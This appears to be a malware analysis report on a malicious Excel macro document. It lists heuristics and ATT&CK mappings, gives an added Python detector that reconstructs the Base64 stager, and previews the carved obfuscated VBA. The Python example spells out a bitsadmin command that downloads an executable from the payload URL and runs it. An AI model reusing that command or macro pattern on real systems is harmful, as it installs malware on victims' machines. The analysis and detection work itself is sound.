Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31f07867af0928c4…

MALICIOUS

Office (OLE)

Size: 48.5 KB
Created: 2018-12-12 22:53:55
Authoring application: Microsoft Excel
First seen: 2019-01-31
MD5: bc35881cba38d95892556a61142b1190
SHA-1: 923f338658fdc26c194b21b7a54f4a801f0f780c
SHA-256: 31f07867af0928c476c3330ecea0537eb15a69bb3231d2a871e6d9909b36012f
Risk score: 264

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_BASE64_SHELL_COMMAND_STAGER indicates that the VBA macro decodes a Base64 string literal into a command line and executes it with Shell. The decoded command uses bitsadmin to download https://a.uchi.moe/ymfbte.jpg, saves it as %USERPROFILE%\nM6cCQIbcF.exe and then launches that file: the .jpg extension only disguises the downloaded executable, and bitsadmin is a signed Windows binary, so both the transfer (ATT&CK T1105) and the launch are living-off-the-land activity. Execution is triggered automatically by the workbook_open event in ThisWorkbook, which calls into the module FRt8pdC_; that module invokes CreateObject on a ProgID held in a module-level String variable whose value is not set anywhere in the visible portion of the preview. The visible source is padded with Do Until "a" <> "b" ... Loop blocks whose exit condition is already true on entry, so the Dim statements inside never execute; they are junk inserted to inflate the code and defeat plain keyword matching.

Heuristics (8)

  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • VBA Base64-decoded Shell command stager [critical] OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://a.uchi.moe/ymfbte.jpg (referenced by macro)
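The stager heuristic and the junk-loop padding visible in the carved macro, as an added Python example that is not part of this report or of the analysis pipeline behind it. It re-implements the idea behind OLE_VBA_BASE64_SHELL_COMMAND_STAGER over a constructed VBA snippet: strip the dead Do Until "a" <> "b" ... Loop blocks, decode Base64-looking string literals, and flag the document only when an auto-exec entry point, a Shell/CreateObject call and a decoded launcher command all coincide, pulling the URL and the drop path out of the decoded text as IOCs. The VBA snippet, the module and helper names (Stager, Decode64) and the exact bitsadmin command line are assumptions modelled on the report's description; only the URL and the drop path come from the page.

```python
"""
Added example (not the report's own tooling): a small re-implementation of the idea
behind OLE_VBA_BASE64_SHELL_COMMAND_STAGER, run over a constructed VBA snippet.
"""
import base64
import re

# Auto-exec entry points: the macro runs as soon as the user enables content.
AUTOEXEC_RE = re.compile(
    r"\b(Workbook_Open|Workbook_Activate|Auto_Open|AutoOpen|AutoExec|Document_Open)\b", re.I)
# VBA primitives that launch a process or instantiate a COM automation object.
EXEC_RE = re.compile(r"\b(Shell|CreateObject|GetObject)\b", re.I)
# Quoted literals made only of the Base64 alphabet and long enough to be worth decoding.
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')
# Binaries a decoded stager command line would name (launchers and LOLBin downloaders).
LAUNCHER_TOKENS = ("cmd", "cscript", "wscript", "powershell", "bitsadmin",
                   "mshta", "certutil", "rundll32", "regsvr32", "curl")
URL_RE = re.compile(r"https?://[^\s\"'<>&]+")
WINPATH_RE = re.compile(r"%[A-Za-z_]+%\\[^\s\"'&]+")
# Padding seen in the carved macro: Do Until "a" <> "b" ... Loop. With a <> b the exit
# condition is already true on entry, so the loop body is dead code.
DEAD_LOOP_RE = re.compile(
    r'^[ \t]*Do Until "([^"]*)" <> "([^"]*)"[ \t]*\r?\n(.*?)^[ \t]*Loop[ \t]*$\n?',
    re.M | re.S)


def strip_dead_loops(src: str) -> str:
    """Drop Do Until loops whose literal-string condition is true on entry."""
    def drop_if_dead(m):
        # a == b would be an infinite loop: real behaviour, so keep it visible.
        return "" if m.group(1) != m.group(2) else m.group(0)
    return DEAD_LOOP_RE.sub(drop_if_dead, src)


def decode_b64_literals(src: str) -> list:
    """Decode Base64-looking literals that yield printable text (UTF-8 or UTF-16LE)."""
    found = []
    for lit in B64_LITERAL_RE.findall(src):
        try:
            raw = base64.b64decode(lit, validate=True)
        except ValueError:  # identifier-like junk that merely resembles Base64
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
                found.append(text)
                break
    return found


def analyze_vba(src: str) -> dict:
    """Apply the stager heuristic and pull IOCs (URLs, drop paths) out of decoded commands."""
    clean = strip_dead_loops(src)
    decoded = decode_b64_literals(clean)
    launchers = sorted({tok for text in decoded for tok in LAUNCHER_TOKENS
                        if re.search(r"\b%s\b" % tok, text, re.I)})
    autoexec = bool(AUTOEXEC_RE.search(clean))
    exec_call = bool(EXEC_RE.search(clean))
    return {
        "autoexec": autoexec,
        "exec_call": exec_call,
        "decoded": decoded,
        "launchers": launchers,
        "urls": sorted({u for text in decoded for u in URL_RE.findall(text)}),
        "paths": sorted({p for text in decoded for p in WINPATH_RE.findall(text)}),
        "base64_shell_stager": autoexec and exec_call and bool(launchers),
    }


# --- constructed sample (assumption modelled on the report's description) -----
# Only the URL and the drop path come from the report; the command line itself is
# invented for the demo. Raw strings: the dropped filename begins with "\n", which
# must not turn into a newline.
STAGER_CMD = (r"cmd /c bitsadmin /transfer upd /download /priority high "
              r"https://a.uchi.moe/ymfbte.jpg %USERPROFILE%\nM6cCQIbcF.exe "
              r"& start %USERPROFILE%\nM6cCQIbcF.exe")
STAGER_B64 = base64.b64encode(STAGER_CMD.encode()).decode()

# Module "Stager" and helper "Decode64" are hypothetical names; the junk loops reuse
# literal pairs visible in the carved macros.bas.
SAMPLE_VBA = f'''Attribute VB_Name = "ThisWorkbook"
Private Sub workbook_open()
Stager.Run
Do Until "vfzu" <> "idDaOnnH"
Dim CBYpf3MIOPga98H8wqsRobrs65diJ1bBsxMqyt As Byte
Loop
End Sub

Attribute VB_Name = "Stager"
Sub Run()
Do Until "Dms8gyLtRu3kkrH7JP" <> "Zl7MJkXT5E5TzPvDvT"
Dim t3ycNVPurWFow_fWqVWpofwpB92L96JRgJATkPdxMazlHLx1vgI7OC_L As CheckBox
Loop
Dim cmd As String
cmd = Decode64("{STAGER_B64}")
Shell cmd, vbHide
End Sub
'''

if __name__ == "__main__":
    for key, value in analyze_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

In practice you would feed analyze_vba the carved macros.bas or the output of olevba's --reveal mode, which already substitutes decoded strings into the source. The literal regex only catches a Base64 blob stored whole in one string; a blob split across & concatenations, or built with Chr() calls, has to be joined first, which is exactly the gap the p-code heuristic OLE_VBA_PCODE_AUTOEXEC_EXEC above is meant to cover when source-level matching fails.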

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10125 bytes
SHA-256: 99d0853e56bb2db62b5d1573d74825a1707797b42ad55cd7a05cf6cd3974209c
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob)

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
FRt8pdC_.ONjqd_nmGGp2sPtOZokP
Do Until "vfzu" <> "idDaOnnH"
Dim CBYpf3MIOPga98H8wqsRobrs65diJ1bBsxMqyt As Byte
Dim HrCxeNRRjf5ba75 As CheckBox
Loop
Do Until "zNiRptkXm8X" <> "werIsZHCh_Nz6bZlS7nrXeE3im"
Dim XH9fRXyFavjYvcSXX4jWlyNFPZ9O9QXxj_B9CApyAyAmA4IJX_FKRKAh As Byte
Dim O2YiGHWvyqZSUVLtVwxjEUOx18JLeXDc_JtxYZp2ON_bs As CheckBox
Loop

Do Until "Dms8gyLtRu3kkrH7JP" <> "Zl7MJkXT5E5TzPvDvT"
Dim aM7h1rvX1Kxqf4D8nzuybFiL3Ex74kyf6xe6R1uNZutKeMhAO2l6R61Smto As Byte
Dim t3ycNVPurWFow_fWqVWpofwpB92L96JRgJATkPdxMazlHLx1vgI7OC_L As CheckBox
Loop
Do Until "EHaNcDvuLxFkDJvY1haM" <> "pJgxJAZZvLBdJwNaxOTIn_XSELwju"
Dim sEqkvf4klDalU89vkYO6SkjMPh As Byte
Dim juLr7MynCFT3XOSzJJ2fREYgcvfmZGebSL5HW4EMvp52ZrA_lb As CheckBox
Loop
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FRt8pdC_"
Dim HDLqgvaVSdUjRUDcZgAV8Rh5bkCPn49QJ76NOLpobzY8G2Mm7XdTlO_yeQN5rJqXeDXUXxLL1U3F3jwiWYROYnn47Fs88t6PG_bCb2NGJPbPV264cnfR As String
 Function YXTsNdUoNJqJM5k1hJSJbPDntkIgEtufA7qEFi7Yvqo5fkb_PiHy(w2uZYzPoG5HKFmmpyt3IWRXMaW8UvcQJCBY5HCQfz26x5ESc4Ma5Lscdbf9A252nm8)
Do Until "tTqXShvfPSigX5G" <> "afbWzH_y4bACmQRBa5QVBYQNjb"
Dim Lu6e5OrzHG_DYz As Byte
Dim tdv5QdHN7QFlEgEAMMvW6M3WgtTvGIBWdZkflV6ES7wmX As CheckBox
Loop
Do Until "QHItG4uPB4fk" <> "XWgIUEwOsGo5hW1PpC8YN9OkIB"
Dim OOEbf_4M9X57z_WoIbNJsBdj85FVXG5_SEf_lnHzmI11tEGXzR As Byte
Dim G5zPLtecj8gx1c5m As CheckBox
Loop

 Dim ngbc9_glHYKyJC_JO7JW34aIB1akSbQQ7WIStyE4ru8Q74Mx4crWFhDt_QaGh5QoF4
Do Until "tcVBdSWfiJmy2w" <> "qeEBw"
Dim byROEJg1ET_WyaV5bOjwfRqBFpkwPArxozI5JF6SueZMIO9YY As Byte
Dim vBya9gIFOGYhtj As CheckBox
Loop
Do Until "DkJq9QatTSPB_2b21" <> "pKVd83VpQ_w48et_4Ul8g_F8Aq"
Dim dJ7fQnWPsVWE_rx_ As Byte
Dim pQmyVxeA_ez3RoDWbPWKstqHeqvVlxO As CheckBox
Loop


   Dim c6t8DhWYkOqqwOOTIlkCwtg27WiBFnQBITvPSl_amk4Uy1LS_5OWGqIsX1_o8TR7
Do Until "IfRySJS" <> "pn5auwc8"
Dim CQ_mxSkP5id As Byte
Dim RoAGXPN6suUNCP6qfwR6TBrrDlIaigOWNy2 As CheckBox
Loop
Do Until "nnefIfzsKpC6V1lDblmHP6" <> "QCvFvVKd89LXPB_PHXcQeBAowj7bw"
Dim ukojrUbtCtcgqqDr8iiCJbMo8YOBERJXsqLWgwhogf_n9txT76xAWXk As Byte
Dim QV_lQEYmshDx_cpJIA As CheckBox
Loop
   
Do Until "enWioLk5_HdIAS_5_fJOiG" <> "UE46xzPum_"
Dim c364wSXpJTdNX As Byte
Dim Cc4hom9tSVvBctOwDxWzIgZGALKuiXwWEq1b3Pj As CheckBox
Loop
Do Until "FnNIeI2SiG3EeEXMdCv" <> "gbZLJ4i"
Dim X5u2w3wLOJ4V48H2lmoRPPqbUXFsGoZDN6t6gpS_RQyLSGGxX As Byte
Dim ixidkQGLRfXuC_jtzG8LKT5Ro99 As CheckBox
Loop
 Set c6t8DhWYkOqqwOOTIlkCwtg27WiBFnQBITvPSl_amk4Uy1LS_5OWGqIsX1_o8TR7 = CreateObject(HDLqgvaVSdUjRUDcZgAV8Rh5bkCPn49QJ76NOLpobzY8G2Mm7XdTlO_yeQN5rJqXeDXUXxLL1U3F3jwiWYROYnn47Fs88t6PG_bCb2NGJPbPV264cnfR)
Do Until "ZdG" <> "MPRTg11hlmlrMI5MNKNbc_IjKN2"
Dim OxkRprIQFbqgs2PdSibEuVatvKB As Byte
Dim nMEqGQ8jtAS6_C1wtfmeiKdyAsHF3V1fcpdCAthOtQfc_mbB3ipLGpbb As CheckBox
Loop
Do Until "rOpXH1qWHwaSgwv_7WtPoAyV" <> "PELSomXwMBTtCIF3jGSKJGc"
Dim vpNs6JvqZR
... (truncated)